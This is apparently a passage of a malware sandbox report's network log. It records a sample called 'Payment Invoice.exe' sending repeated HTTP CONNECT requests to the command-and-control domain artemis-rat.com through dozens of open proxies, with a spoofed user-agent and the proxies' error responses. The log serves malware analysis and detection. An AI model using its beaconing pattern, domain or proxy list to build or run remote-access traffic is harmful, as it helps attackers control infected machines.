                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.127999067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                382192.168.2.451181154.12.178.107299857076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.128056049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                383192.168.2.45032851.79.87.144225007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.128135920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.214371920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.215313911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.214740992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                384192.168.2.45118058.234.116.197807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.129107952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                385192.168.2.45123323.95.209.142156737076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.129204988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                386192.168.2.45121872.10.164.17859357076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.130809069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.894119024 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                387192.168.2.45023291.189.177.18631287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.132275105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.756340981 CET536INHTTP/1.1 403 Forbidden
                                                                Server: squid/5.7
                                                                Mime-Version: 1.0
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html;charset=utf-8
                                                                Content-Length: 3628
                                                                X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                Vary: Accept-Language
                                                                Content-Language: en
                                                                X-Cache: MISS from lb1
                                                                X-Cache-Lookup: NONE from lb1:3128
                                                                Via: 1.1 lb1 (squid/5.7)
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundatio


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                388192.168.2.45119227.0.234.20610807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.132374048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                389192.168.2.450249103.151.20.131807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.132473946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:43.191699028 CET806INHTTP/1.1 500 Internal Server Error
                                                                Date: Mon, 11 Mar 2024 15:15:43 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 614
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                390192.168.2.450402189.173.223.2259997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.132550001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.214375019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.215326071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.214736938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:40.214560032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:52.323582888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:04.324161053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:28.323950052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:16.323767900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                391192.168.2.450258128.199.221.91498657076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.132672071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.214394093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                392192.168.2.451191185.132.242.21280837076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.132760048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                393192.168.2.45119339.105.5.126807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.132929087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                394192.168.2.45020720.204.214.7931297076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.133176088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.566679955 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                395192.168.2.451230184.178.172.1441457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.133246899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                396192.168.2.451235174.64.199.8241457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.133321047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                397192.168.2.4512051.15.62.1256787076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.133677959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.886226892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                398192.168.2.451216152.32.130.117180807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.133812904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                399192.168.2.45020641.223.232.11731287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.135515928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.626749992 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                400192.168.2.450385201.71.3.429997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.140971899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.184184074 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                401192.168.2.45125766.45.246.19488887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.142272949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                402192.168.2.450467184.178.172.341457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.142540932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                403192.168.2.45134243.153.174.1974437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.144684076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                404192.168.2.45035295.84.166.13880807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.144702911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                405192.168.2.451272172.64.152.98807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.144737005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.299271107 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                406192.168.2.451246202.179.184.4454307076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.148196936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                407192.168.2.451229103.190.54.14180807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.148586035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                408192.168.2.45128331.204.28.9654327076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.153280020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.357950926 CET308INHTTP/1.1 407 Proxy Authentication Required
                                                                Server: FaaS v1.3-20220203-7fa38bd5af
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/plain; charset=utf-8
                                                                Content-Length: 65
                                                                Proxy-Authenticate: Basic realm="Proxy"
                                                                Connection: close
                                                                Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                                                Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                409192.168.2.45127472.10.164.178307177076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.153346062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                410192.168.2.45127772.10.160.90298137076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.153470039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.101352930 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                411192.168.2.451315104.16.105.198807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.153496981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.307784081 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
